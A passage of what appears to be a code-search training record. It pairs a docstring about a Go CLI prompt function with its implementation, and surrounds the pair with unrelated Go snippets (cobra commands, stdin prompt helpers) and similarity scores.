\"version\",\n\t\tArgs: cobra.NoArgs,\n\t\tShort: \"Print the stanza version\",\n\t\tRun: func(_ *cobra.Command, _ []string) {\n\t\t\tfmt.Println(version.GetVersion(), runtime.GOOS, runtime.GOARCH)\n\t\t},\n\t}\n}", "func NewVersionCommand(version string, buildDate string, out io.Writer) *cobra.Command {\n\tversionCmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"display the current version\",\n\t\tLong: \"display the current version\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfmt.Fprintf(out, \"Primes Worker:\\n\")\n\t\t\tfmt.Fprintf(out, \" Version: %s\\n\", version)\n\t\t\tfmt.Fprintf(out, \" Built: %s\\n\", buildDate)\n\t\t\tfmt.Fprintf(out, \" Go Version: %s\\n\", runtime.Version())\n\t\t},\n\t}\n\n\treturn versionCmd\n}", "func NewCmdURLCreate(name, fullName string) *cobra.Command {\n\to := NewURLCreateOptions()\n\turlCreateCmd := &cobra.Command{\n\t\tUse: name + \" [url name]\",\n\t\tShort: urlCreateShortDesc,\n\t\tLong: urlCreateLongDesc,\n\t\tExample: fmt.Sprintf(urlCreateExample, fullName),\n\t\tArgs: cobra.MaximumNArgs(1),\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tgenericclioptions.GenericRun(o, cmd, args)\n\t\t},\n\t}\n\turlCreateCmd.Flags().IntVarP(&o.urlPort, \"port\", \"\", -1, \"Port number for the url of the component, required in case of components which expose more than one service port\")\n\t// if experimental mode is enabled, add more flags to support ingress creation or docker application based on devfile\n\to.isExperimental = experimental.IsExperimentalModeEnabled()\n\tif o.isExperimental {\n\t\to.isDocker = pushtarget.IsPushTargetDocker()\n\t\tif o.isDocker {\n\t\t\turlCreateCmd.Flags().IntVarP(&o.exposedPort, \"exposed-port\", \"\", -1, \"External port to the application container\")\n\t\t\turlCreateCmd.Flags().BoolVarP(&o.forceFlag, \"force\", \"f\", false, \"Don't ask for confirmation, assign an exposed port directly\")\n\t\t\turlCreateCmd.Example = fmt.Sprintf(urlCreateExampleDocker, fullName)\n\t\t} else {\n\t\t\turlCreateCmd.Flags().StringVar(&o.tlsSecret, \"tls-secret\", \"\", \"TLS secret name for the url of the component if the user bring their own TLS secret\")\n\t\t\turlCreateCmd.Flags().StringVarP(&o.host, \"host\", \"\", \"\", \"Cluster IP for this URL\")\n\t\t\turlCreateCmd.Flags().BoolVarP(&o.secureURL, \"secure\", \"\", false, \"Create a secure HTTPS URL\")\n\t\t\turlCreateCmd.Flags().BoolVar(&o.wantIngress, \"ingress\", false, \"Create an Ingress instead of Route on OpenShift clusters\")\n\t\t\turlCreateCmd.Example = fmt.Sprintf(urlCreateExampleExperimental, fullName)\n\t\t}\n\t} else {\n\t\turlCreateCmd.Flags().BoolVarP(&o.secureURL, \"secure\", \"\", false, \"Create a secure HTTPS URL\")\n\t\turlCreateCmd.Example = fmt.Sprintf(urlCreateExample, fullName)\n\t}\n\tgenericclioptions.AddNowFlag(urlCreateCmd, &o.now)\n\to.AddContextFlag(urlCreateCmd)\n\tcompletion.RegisterCommandFlagHandler(urlCreateCmd, \"context\", completion.FileCompletionHandler)\n\n\treturn urlCreateCmd\n}", "func createCommandVM() {\n\tVmCommand = goja.New()\n\n\terr := VmCommand.Set(\"call\", Call)\n\tif err != nil {\n\t\t//TODO write to error log\n\t\tfmt.Println(err)\n\t}\n\terr = VmCommand.Set(\"printToLog\", PrintToLog)\n\tif err != nil {\n\t\tWriteErrorLog(err.Error(), \"\")\n\t}\n\terr = VmCommand.Set(\"callCompare\", CallCompare)\n\tif err != nil {\n\t\t//TODO write to error log\n\t\tfmt.Println(err)\n\t}\n\terr = VmCommand.Set(\"callContains\", CallContains)\n\tif err != nil {\n\t\t//TODO write to error log\n\t\tfmt.Println(err)\n\t}\n\terr = VmCommand.Set(\"printToConsole\", PrintToConsole)\n\tif err != nil {\n\t\t//TODO write to error log\n\t\tfmt.Println(err)\n\t}\n\terr = VmCommand.Set(\"shell\", Shell)\n\tif err != nil {\n\t\t//TODO write to error log\n\t\tfmt.Println(err)\n\t}\n}", "func New(cmd *cobra.Command, args []string) {\n\t// Create object for current working directory\n\tpwd, err := teflon.NewTeflonObject(\".\")\n\tif err != nil {\n\t\tlog.Fatalln(\"Couldn't create object for '.' :\", err)\n\t}\n\n\t// Create a show.\n\tif showFlag {\n\t\tnshws, err := pwd.CreateShow(args[0], newShowProtoFlag)\n\t\tif err != nil {\n\t\t\tlog.Fatalln(\"ABORT: Couldnt create show:\", err)\n\t\t}\n\t\tfor _, shw := range nshws {\n\t\t\tfmt.Println(shw.Path)\n\t\t}\n\t\treturn\n\t}\n\n\t// If nothing else commands otherwise new will create an ordinary file-system\n\t// object.\n\tnobjs, err := pwd.CreateObject(args[0], newFileFlag)\n\tif err != nil {\n\t\tlog.Fatalln(\"ABORT: Couldn't create objects:\", err)\n\t}\n\tclose(teflon.Events)\n\tfor _, obj := range nobjs {\n\t\tfmt.Println(obj.Path)\n\t}\n}", "func (task SchTask) Create(taskcreate TaskCreate) string {\n\tcmds := task.TaskMake(taskcreate, _Create.Command, true)\n\n\tif Debug {\n\t\treturn dbgMessage\n\t}\n\n\tcmd := exec.Command(task.bin, cmds...)\n\n\toutput, err := cmd.CombinedOutput()\n\tcatch(output, err)\n\n\treturn string(output)\n}", "func CommandCreate(appName string) error {\n\tif err := common.IsValidAppName(appName); err != nil {\n\t\treturn err\n\t}\n\n\treturn createApp(appName)\n}", "func (c *ProjectsTransferConfigsCreateCall) VersionInfo(versionInfo string) *ProjectsTransferConfigsCreateCall {\n\tc.urlParams_.Set(\"versionInfo\", versionInfo)\n\treturn c\n}", "func NewGenerateCmd(client *registry.HTTPClient) *cobra.Command {\n\tgenerateCmd := &cobra.Command{\n\t\tUse: \"generate\",\n\t\tShort: \"Generate a Lockfile to track image digests\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif err := validateGenerateCmdFlags(cmd); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tenvPath, err := cmd.Flags().GetString(\"env-file\")\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tenvPath = filepath.ToSlash(envPath)\n\t\t\t_ = godotenv.Load(envPath)\n\t\t\twm, err := getDefaultWrapperManager(cmd, client)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tgenerator, err := generate.NewGenerator(cmd)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tlFile, err := os.Create(generator.LockfileName)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer lFile.Close()\n\t\t\tif err := generator.GenerateLockfile(wm, lFile); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t}\n\tgenerateCmd.Flags().String(\n\t\t\"base-dir\", \".\", \"Top level directory to collect files from\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"dockerfiles\", []string{}, \"Path to Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"compose-files\", []string{}, \"Path to docker-compose files\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"dockerfile-globs\", []string{}, \"Glob pattern to select Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"compose-file-globs\", []string{},\n\t\t\"Glob pattern to select docker-compose files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"dockerfile-recursive\", false, \"Recursively collect Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"compose-file-recursive\", false,\n\t\t\"Recursively collect docker-compose files\",\n\t)\n\tgenerateCmd.Flags().String(\n\t\t\"lockfile-name\", \"docker-lock.json\",\n\t\t\"Lockfile name to be output in the current working directory\",\n\t)\n\tgenerateCmd.Flags().String(\n\t\t\"config-file\", getDefaultConfigPath(),\n\t\t\"Path to config file for auth credentials\",\n\t)\n\tgenerateCmd.Flags().String(\n\t\t\"env-file\", \".env\", \"Path to .env file\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"dockerfile-env-build-args\", false,\n\t\t\"Use environment vars as build args for Dockerfiles\",\n\t)\n\treturn generateCmd\n}", "func Create(instructionData reflect.Value, finished chan bool) int {\n\tfmt.Println(\"FIBER INFO: Creating File ...\")\n\n\tpath, err := variable.GetValue(instructionData, \"PathVarName\", \"PathIsVar\", \"Path\")\n\tif err != nil {\n\t\tfinished <- true\n\t\treturn -1\n\t}\n\n\tf, _ := os.Create(path.(string))\n\tf.Close()\n\tfinished <- true\n\treturn -1\n}", "func (p *MetadataServiceClient) CreateHostInfo(request *CreateHostInfoRequest) (err error) {\n if err = p.sendCreateHostInfo(request); err != nil { return }\n return p.recvCreateHostInfo()\n}", "func NewCreateCmd(globalFlags *flags.GlobalFlags) *cobra.Command {\n\tcmd := &CreateCmd{\n\t\tGlobalFlags: globalFlags,\n\t\tlog: log.GetInstance(),\n\t}\n\n\tcobraCmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Create a new virtual cluster\",\n\t\tLong: `\n#######################################################\n################### vcluster create ###################\n#######################################################\nCreates a new virtual cluster\n\nExample:\nvcluster create test --namespace test\n#######################################################\n\t`,\n\t\tArgs: cobra.ExactArgs(1),\n\t\tRunE: func(cobraCmd *cobra.Command, args []string) error {\n\t\t\t// Check for newer version\n\t\t\tupgrade.PrintNewerVersionWarning()\n\n\t\t\treturn cmd.Run(cobraCmd, args)\n\t\t},\n\t}\n\n\tcobraCmd.Flags().StringVar(&cmd.ChartVersion, \"chart-version\", upgrade.GetVersion(), \"The virtual cluster chart version to use\")\n\tcobraCmd.Flags().StringVar(&cmd.ChartName, \"chart-name\", \"vcluster\", \"The virtual cluster chart name to use\")\n\tcobraCmd.Flags().StringVar(&cmd.ChartRepo, \"chart-repo\", \"https://charts.loft.sh\", \"The virtual cluster chart repo to use\")\n\tcobraCmd.Flags().StringVar(&cmd.ReleaseValues, \"release-values\", \"\", \"Path where to load the virtual cluster helm release values from\")\n\tcobraCmd.Flags().StringVar(&cmd.K3SImage, \"k3s-image\", \"\", \"If specified, use this k3s image version\")\n\tcobraCmd.Flags().StringSliceVarP(&cmd.ExtraValues, \"extra-values\", \"f\", []string{}, \"Path where to load extra helm values from\")\n\tcobraCmd.Flags().BoolVar(&cmd.CreateNamespace, \"create-namespace\", true, \"If true the namespace will be created if it does not exist\")\n\tcobraCmd.Flags().BoolVar(&cmd.DisableIngressSync, \"disable-ingress-sync\", false, \"If true the virtual cluster will not sync any ingresses\")\n\tcobraCmd.Flags().BoolVar(&cmd.CreateClusterRole, \"create-cluster-role\", false, \"If true a cluster role will be created to access nodes, storageclasses and priorityclasses\")\n\tcobraCmd.Flags().BoolVar(&cmd.Expose, \"expose\", false, \"If true will create a load balancer service to expose the vcluster endpoint\")\n\tcobraCmd.Flags().BoolVar(&cmd.Connect, \"connect\", false, \"If true will run vcluster connect directly after the vcluster was created\")\n\treturn cobraCmd\n}", "func NewCmdVersion(w io.Writer) *cobra.Command {\n\tvar short bool\n\n\tversionCmd := cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints the kustomize version\",\n\t\tExample: `kustomize version`,\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tif short {\n\t\t\t\tfmt.Fprintln(w, provenance.GetProvenance().Short())\n\t\t\t} else {\n\t\t\t\tfmt.Fprintln(w, provenance.GetProvenance().Full())\n\t\t\t}\n\t\t},\n\t}\n\n\tversionCmd.Flags().BoolVar(&short, \"short\", false, \"short form\")\n\treturn &versionCmd\n}", "func newVersionCommands(globalOpts *globalOptions) *cobra.Command {\n\toptions := &versionOptions{\n\t\tglobalOptions: globalOpts,\n\t}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Print the CLI version information\",\n\t\tLong: versionDesc,\n\t\tExample: versionExample,\n\t\tArgs: cobra.ExactArgs(0),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn options.run()\n\t\t},\n\t}\n\n\toptions.addVersionFlags(cmd)\n\n\treturn cmd\n}" ]
[ "0.67512655", "0.63318264", "0.6103407", "0.60789835", "0.5999456", "0.5973875", "0.5964833", "0.5921458", "0.5850257", "0.5830768", "0.58251804", "0.57971406", "0.57530457", "0.5738728", "0.57342035", "0.57266986", "0.5688524", "0.5670645", "0.5661567", "0.5643408", "0.5619693", "0.5607867", "0.55740327", "0.55710053", "0.55644447", "0.5555344", "0.55357057", "0.55351454", "0.55273294", "0.54993707", "0.5486091", "0.5482614", "0.54783547", "0.54783547", "0.546671", "0.54543495", "0.54367363", "0.5409888", "0.53711873", "0.53689283", "0.53492653", "0.5340139", "0.5326371", "0.5322513", "0.52787167", "0.5271996", "0.5268546", "0.5259433", "0.52512765", "0.5246953", "0.52451533", "0.52446485", "0.52279425", "0.522216", "0.5216249", "0.52149737", "0.52115345", "0.52049756", "0.5178693", "0.5170864", "0.51682323", "0.51653993", "0.51621383", "0.51546067", "0.5140187", "0.51177895", "0.5107838", "0.510107", "0.50945103", "0.5090444", "0.50705475", "0.5057607", "0.5051193", "0.5042463", "0.50420076", "0.5033997", "0.5031791", "0.5029592", "0.5022205", "0.5016729", "0.5014038", "0.5010517", "0.5008679", "0.5004366", "0.49982426", "0.4986812", "0.49864066", "0.49837685", "0.49782386", "0.49772057", "0.49724215", "0.49721596", "0.4948986", "0.49296787", "0.49295655", "0.49235618", "0.4921486", "0.49180457", "0.4917587", "0.49071962" ]
0.8077462
0
Prompt displays a CLI prompt to the user. It prints the specified message, and gives a list of options, with a preselected default (1 to not set any default). It reads the user input from the specified input stream (e.g. os.Stdin) and returns the selected option as a string.
func Prompt(stream io.Reader, message string, defaultIdx int, options ...string) (string, error) { if len(options) < 1 { return "", errors.New("no options specified") } validOptions := map[string]bool{} var buf bytes.Buffer buf.WriteString(message) buf.WriteString(" (") for i, o := range options { validOptions[strings.ToLower(o)] = true if i == defaultIdx { buf.WriteString(strings.Title(o)) } else { buf.WriteString(o) } if i < len(options)-1 { buf.WriteString("/") } } buf.WriteString(") ") reader := bufio.NewReader(stream) for { fmt.Print(buf.String()) selected, _ := reader.ReadString('\n') selected = strings.TrimSpace(selected) if selected == "" { return options[defaultIdx], nil } if valid, _ := validOptions[strings.ToLower(selected)]; valid { return selected, nil } } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func Prompt(prompt string) (s string, err error) {\n\tfmt.Printf(\"%s\", prompt)\n\tstdin := bufio.NewReader(os.Stdin)\n\tl, _, err := stdin.ReadLine()\n\treturn string(l), err\n}", "func InputPrompt(label string, required bool) string {\n\tinput := bufio.NewScanner(os.Stdin)\n\n\tfmt.Printf(\"%s : \\n\", label)\n\tfor input.Scan() {\n\n\t\tinputValue := input.Text()\n\t\tif !required || len(inputValue) > 0 {\n\t\t\treturn inputValue\n\t\t}\n\n\t\tfmt.Printf(\"%s : \\n\", label)\n\t}\n\n\treturn \"\"\n}", "func (console *Console) Prompt() (string, error) {\n\tfmt.Print(\">\")\n\n\trawInput, hasMore, err := console.reader.ReadLine()\n\n\tif err != nil {\n\t\treturn \"\", errors.Wrap(err, \"issue reading from STDIN\")\n\t}\n\n\tinput := string(rawInput)\n\n\tif hasMore {\n\t\trawInput, hasMore, err = console.reader.ReadLine()\n\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrap(err, \"issue reading additional characters in buffer\")\n\t\t}\n\n\t\tinput += string(rawInput)\n\t}\n\n\treturn input, nil\n}", "func Prompt(msg string) (string, error) {\n\tif !IsInteractive() {\n\t\treturn \"\", fmt.Errorf(\"not an interactive session\")\n\t}\n\n\tpromptMux.Lock()\n\tdefer promptMux.Unlock()\n\n\tvar v string\n\tfmt.Fprintf(os.Stderr, \"%s: \", msg)\n\t_, err := fmt.Scanln(&v)\n\treturn v, err\n}", "func (c *Client) Ask(prompt string) string {\n\tfmt.Printf(\"%s \", prompt)\n\trd := bufio.NewReader(os.Stdin)\n\tline, err := rd.ReadString('\\n')\n\tif err == nil {\n\t\treturn strings.TrimSpace(line)\n\t}\n\treturn \"\"\n}", "func (q *Query) Prompt() {\n\tfmt.Printf(\"\\n%s [%s]: \", q.Question, q.DefaultValue)\n\tvar response string\n\tfmt.Scanln(&response)\n\tq.Answer = response\n\n}", "func prompt(promptText string) string {\n\tfmt.Fprint(cmdmain.Stdout, promptText)\n\tsc := bufio.NewScanner(cmdmain.Stdin)\n\tsc.Scan()\n\treturn strings.TrimSpace(sc.Text())\n}", "func Prompt(msg string, isPassword bool) (string, error) {\n\tvalidate := func(input string) error {\n\t\tif input == \"\" {\n\t\t\treturn errors.New(\"Value can't be empty\")\n\t\t}\n\t\treturn nil\n\t}\n\n\tvar prompt promptui.Prompt\n\tif isPassword == true {\n\t\tprompt = promptui.Prompt{\n\t\t\tLabel: msg,\n\t\t\tValidate: validate,\n\t\t\tMask: '*',\n\t\t}\n\t} else {\n\t\tprompt = promptui.Prompt{\n\t\t\tLabel: msg,\n\t\t\tValidate: validate,\n\t\t}\n\t}\n\n\tresult, err := prompt.Run()\n\tHandleError(err)\n\n\treturn result, nil\n}", "func Ask(label, startString string) (string, error) {\n\tp := Prompt{\n\t\tBasicPrompt: BasicPrompt{\n\t\t\tLabel: label,\n\t\t\tDefault: startString,\n\t\t},\n\t}\n\treturn p.Run()\n}", "func (c *Config) promptChoice(prompt string, choices []string, args ...string) (string, error) {\n\tvar defaultValue *string\n\tswitch len(args) {\n\tcase 0:\n\t\t// Do nothing.\n\tcase 1:\n\t\tif !slices.Contains(choices, args[0]) {\n\t\t\treturn \"\", fmt.Errorf(\"%s: invalid default value\", args[0])\n\t\t}\n\t\tdefaultValue = &args[0]\n\tdefault:\n\t\treturn \"\", fmt.Errorf(\"want 2 or 3 arguments, got %d\", len(args)+2)\n\t}\n\tif c.interactiveTemplateFuncs.promptDefaults && defaultValue != nil {\n\t\treturn *defaultValue, nil\n\t}\n\treturn c.readChoice(prompt, choices, defaultValue)\n}", "func (p *Prompt) Ask(text string, opts *InputOptions) (string, error) {\n\tformat := p.fmtInputOptions(opts)\n\n\tresp, err := p.read(text, format)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tinput := strings.TrimSpace(resp)\n\n\t// show me what you're working with\n\tswitch input {\n\tcase \"\":\n\t\t// check the opts\n\t\tswitch opts {\n\t\tcase nil:\n\t\t\t// no options and no input means we return an error\n\t\t\treturn \"\", errors.New(\"no input or default value provided\")\n\t\tdefault:\n\t\t\t// check if there is a default to return\n\t\t\tif opts.Default != \"\" {\n\t\t\t\treturn opts.Default, nil\n\t\t\t}\n\n\t\t\tif opts.Validator != nil {\n\t\t\t\t// validate in provided input - even if empty\n\t\t\t\tif err := opts.Validator(input); err != nil {\n\t\t\t\t\treturn \"\", err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\tdefault:\n\t\tswitch opts {\n\t\tcase nil:\n\t\t\t// there are no options, so just return the input\n\t\t\treturn input, nil\n\t\tdefault:\n\t\t\tif opts.Validator != nil {\n\t\t\t\t// validate in provided input\n\t\t\t\tif err := opts.Validator(input); err != nil {\n\t\t\t\t\treturn \"\", err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn input, nil\n}", "func PromptUserForInput(prompt string, terragruntOptions *options.TerragruntOptions) (string, error) {\n\t// We are writing directly to ErrWriter so the prompt is always visible\n\t// no matter what logLevel is configured. If `--non-interactive` is set, we log both prompt and\n\t// a message about assuming `yes` to Debug, so\n\tif terragruntOptions.NonInteractive {\n\t\tterragruntOptions.Logger.Debugf(prompt)\n\t\tterragruntOptions.Logger.Debugf(\"The non-interactive flag is set to true, so assuming 'yes' for all prompts\")\n\t\treturn \"yes\", nil\n\t}\n\tn, err := terragruntOptions.ErrWriter.Write([]byte(prompt))\n\tif err != nil {\n\t\tterragruntOptions.Logger.Error(err)\n\t\treturn \"\", errors.WithStackTrace(err)\n\t}\n\tif n != len(prompt) {\n\t\tterragruntOptions.Logger.Errorln(\"Failed to write data\")\n\t\treturn \"\", errors.WithStackTrace(err)\n\t}\n\n\treader := bufio.NewReader(os.Stdin)\n\n\ttext, err := reader.ReadString('\\n')\n\tif err != nil {\n\t\treturn \"\", errors.WithStackTrace(err)\n\t}\n\n\treturn strings.TrimSpace(text), nil\n}", "func (ptr *terminalPrompter) PromptInput(prompt string) (string, error) {\n\tif ptr.supported {\n\t\tptr.rawMode.ApplyMode()\n\t\tdefer ptr.normalMode.ApplyMode()\n\t} else {\n\t\t// liner tries to be smart about printing the prompt\n\t\t// and doesn't print anything if input is redirected.\n\t\t// Un-smart it by printing the prompt always.\n\t\tfmt.Print(prompt)\n\t\tprompt = \"\"\n\t\tdefer fmt.Println()\n\t}\n\treturn ptr.State.Prompt(prompt)\n}", "func SetPrompt(prompt string) {\n\tcliPrompt = fmt.Sprintf(\"%s \", prompt)\n}", "func TermPrompt(prompt string, options []string, wait bool) int {\n\tscreenb := TempFini()\n\n\tidx := -1\n\t// same behavior as do { ... } while (wait && idx == -1)\n\tfor ok := true; ok; ok = wait && idx == -1 {\n\t\treader := bufio.NewReader(os.Stdin)\n\t\tfmt.Print(prompt)\n\t\tresp, _ := reader.ReadString('\\n')\n\t\tresp = strings.TrimSpace(resp)\n\n\t\tfor i, opt := range options {\n\t\t\tif resp == opt {\n\t\t\t\tidx = i\n\t\t\t}\n\t\t}\n\n\t\tif wait && idx == -1 {\n\t\t\tfmt.Println(\"\\nInvalid choice.\")\n\t\t}\n\t}\n\n\tTempStart(screenb)\n\n\treturn idx\n}", "func PromptMessage(message, value string) string {\n\tfor value == \"\" {\n\t\treader := bufio.NewReader(os.Stdin)\n\t\tfmt.Print(message + \": \")\n\t\tvalueRaw, err := reader.ReadString('\\n')\n\t\terrors.CheckError(err)\n\t\tvalue = strings.TrimSpace(valueRaw)\n\t}\n\treturn value\n}", "func TestGetInput(t *testing.T) {\n\tassert := asrt.New(t)\n\n\t// Try basic GetInput\n\tinput := \"InputIWantToSee\"\n\trestoreOutput := util.CaptureUserOut()\n\tscanner := bufio.NewScanner(strings.NewReader(input))\n\tutil.SetInputScanner(scanner)\n\tresult := util.GetInput(\"nodefault\")\n\tassert.EqualValues(input, result)\n\t_ = restoreOutput()\n\n\t// Try Prompt() with a default value which is overridden\n\tinput = \"InputIWantToSee\"\n\trestoreOutput = util.CaptureUserOut()\n\tscanner = bufio.NewScanner(strings.NewReader(input))\n\tutil.SetInputScanner(scanner)\n\tresult = util.Prompt(\"nodefault\", \"expected default\")\n\tassert.EqualValues(input, result)\n\t_ = restoreOutput()\n\n\t// Try Prompt() with a default value but don't provide a response\n\tinput = \"\"\n\trestoreOutput = util.CaptureUserOut()\n\tscanner = bufio.NewScanner(strings.NewReader(input))\n\tutil.SetInputScanner(scanner)\n\tresult = util.Prompt(\"nodefault\", \"expected default\")\n\tassert.EqualValues(\"expected default\", result)\n\t_ = restoreOutput()\n\tprintln() // Just lets goland find the PASS or FAIL\n}", "func Prompt(msg string) (string, error) {\n\tif !IsInteractive() {\n\t\treturn \"\", fmt.Errorf(\"not an interactive session\")\n\t}\n\n\tpromptMux.Lock()\n\tdefer promptMux.Unlock()\n\n\t// Even if Wash is running interactively, it will not have control of STDIN while another command\n\t// is running within the shell environment. If it doesn't have control and tries to read from it,\n\t// the read will fail. If we have control, read normally. If not, temporarily acquire control for\n\t// the current process group while we're prompting, then return it afterward so the triggering\n\t// command can continue.\n\tinFd := int(os.Stdin.Fd())\n\tinGrp, err := tcGetpgrp(inFd)\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"error getting process group controlling stdin: %v\", err)\n\t}\n\tcurGrp := unix.Getpgrp()\n\n\tvar v string\n\tif inGrp == curGrp {\n\t\t// We control stdin\n\t\tfmt.Fprintf(os.Stderr, \"%s: \", msg)\n\t\t_, err = fmt.Scanln(&v)\n\t} else {\n\t\t// Need to get control, prompt, then return control.\n\t\tif err := tcSetpgrp(inFd, curGrp); err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"error getting control of stdin: %v\", err)\n\t\t}\n\t\tfmt.Fprintf(os.Stderr, \"%s: \", msg)\n\t\t_, err = fmt.Scanln(&v)\n\t\tif err := tcSetpgrp(inFd, inGrp); err != nil {\n\t\t\t// Panic if we can't return control. A messed up environment that they 'kill -9' is worse.\n\t\t\tpanic(err.Error())\n\t\t}\n\t}\n\t// Return the error set by Scanln.\n\treturn v, err\n}", "func prompt(v interface{}) (string, error) {\n\tval, ok := v.(string)\n\tif !ok {\n\t\treturn \"\", fmt.Errorf(\"expected string, got %T\", v)\n\t}\n\treturn fmt.Sprintf(\"%q\", val), nil\n}", "func (term *Terminal) simplePrompt(prefix string) (string, error) {\n\tif term.simpleReader == nil {\n\t\tterm.simpleReader = bufio.NewReader(term.In)\n\t}\n\n\t_, err := term.Out.Write([]byte(prefix))\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tline, err := term.simpleReader.ReadString('\\n')\n\tline = strings.TrimRight(line, \"\\r\\n \")\n\tline = strings.TrimLeft(line, \" \")\n\n\treturn line, err\n}", "func GetFromStdin(params *GetFromStdinParams) *string {\n\tvar prompt survey.Prompt\n\tvar result *string\n\tcompiledRegex := DefaultValidationRegexPattern\n\tif params.ValidationRegexPattern != \"\" {\n\t\tcompiledRegex = regexp.MustCompile(params.ValidationRegexPattern)\n\t}\n\n\tif params.Options != nil {\n\t\tprompt = &survey.Select{\n\t\t\tMessage: params.Question,\n\t\t\tOptions: params.Options,\n\t\t\tDefault: params.DefaultValue,\n\t\t}\n\t} else if params.IsPassword {\n\t\tprompt = &survey.Password{\n\t\t\tMessage: params.Question,\n\t\t}\n\t} else {\n\t\tprompt = &survey.Input{\n\t\t\tMessage: params.Question,\n\t\t\tDefault: params.DefaultValue,\n\t\t}\n\t}\n\n\tquestion := []*survey.Question{\n\t\t{\n\t\t\tName: \"question\",\n\t\t\tPrompt: prompt,\n\t\t},\n\t}\n\n\tif params.Options != nil {\n\t\tquestion[0].Validate = func(val interface{}) error {\n\t\t\t// since we are validating an Input, the assertion will always succeed\n\t\t\tif str, ok := val.(string); !ok || compiledRegex.MatchString(str) == false {\n\t\t\t\treturn fmt.Errorf(\"Answer has to match pattern: %s\", compiledRegex.String())\n\t\t\t}\n\t\t\treturn nil\n\t\t}\n\t}\n\n\tfor result == nil {\n\t\t// Ask it\n\t\tanswers := struct {\n\t\t\tQuestion string\n\t\t}{}\n\t\terr := survey.Ask(question, &answers)\n\t\tif err != nil {\n\t\t\tif strings.HasPrefix(err.Error(), \"Answer has to match pattern\") {\n\t\t\t\tlog.Info(err.Error())\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// Keyboard interrupt\n\t\t\tos.Exit(0)\n\t\t}\n\n\t\tresult = &answers.Question\n\t}\n\n\treturn result\n}", "func (f *Fs) Prompt(key, question string) string {\n\treader := bufio.NewReader(os.Stdin)\n\tfmt.Print(\"string | \" + question)\n\ttext, _ := reader.ReadString('\\n')\n\ttext = strings.TrimSpace(text)\n\ttext = strings.TrimRight(text, \"`\")\n\ttext = strings.TrimLeft(text, \"`\")\n\tif strings.Contains(text, \"?\") {\n\t\tnewtext := strings.Split(text, \"?\")\n\t\ttext = newtext[0]\n\t}\n\tf.Set(key, text)\n\treturn text\n}", "func (cli *CliPrompter) String(pr string, defaultValue string) string {\n\tval := \"\"\n\tprompt := &survey.Input{\n\t\tMessage: pr,\n\t\tDefault: defaultValue,\n\t}\n\t_ = survey.AskOne(prompt, &val)\n\treturn val\n}", "func (cli CLI) AskString(query string, defaultStr string) (string, error) {\n\n\tsigCh := make(chan os.Signal, 1)\n\tsignal.Notify(sigCh, os.Interrupt)\n\tdefer signal.Stop(sigCh)\n\n\tresult := make(chan string, 1)\n\tgo func() {\n\t\tfmt.Fprintf(cli.errStream, \"%s [default: %s] \", query, defaultStr)\n\n\t\t// TODO when string includes blank ...\n\t\treader := bufio.NewReader(os.Stdin)\n\t\tline, err := reader.ReadString('\\n')\n\t\tif err != nil {\n\t\t\tDebugf(\"Failed to scan stdin: %s\", err.Error())\n\t\t}\n\t\tDebugf(\"Input: %q\", line)\n\n\t\t// Use Default value\n\t\tline = strings.TrimRight(line, \"\\n\")\n\t\tif line == \"\" {\n\t\t\tresult <- defaultStr\n\t\t}\n\n\t\tresult <- line\n\t}()\n\n\tselect {\n\tcase <-sigCh:\n\t\treturn \"\", fmt.Errorf(\"interrupted\")\n\tcase str := <-result:\n\t\treturn str, nil\n\t}\n}", "func PromptForInput(ctx context.Context, prompt string) (string, error) {\n\tvar input string\n\tscanner := bufio.NewScanner(os.Stdin)\n\tfmt.Println(prompt)\n\tscanner.Scan()\n\tinput = scanner.Text()\n\tif scanner.Err() != nil {\n\t\tlog.Error(ctx, \"Failed to read user input\", scanner.Err())\n\t\treturn \"\", scanner.Err()\n\t}\n\treturn input, nil\n}", "func RunPrompt(label string, items []string) (string, error) {\n\tprompt := promptui.Select{\n\t\tLabel: label,\n\t\tItems: items,\n\t}\n\n\t_, res, err := prompt.Run()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn res, err\n}", "func (d *Dmenu) Popup(prompt string, options ...string) (selection string, err error) {\n\tprocessedArgs := []string{}\n\tfor _, arg := range d.arguments {\n\t\tvar parg string\n\t\tif strings.Contains(arg, \"%s\") {\n\t\t\tparg = fmt.Sprintf(arg, prompt)\n\t\t} else {\n\t\t\tparg = arg\n\t\t}\n\n\t\tprocessedArgs = append(processedArgs, parg)\n\t}\n\tcmd := exec.Command(d.command, 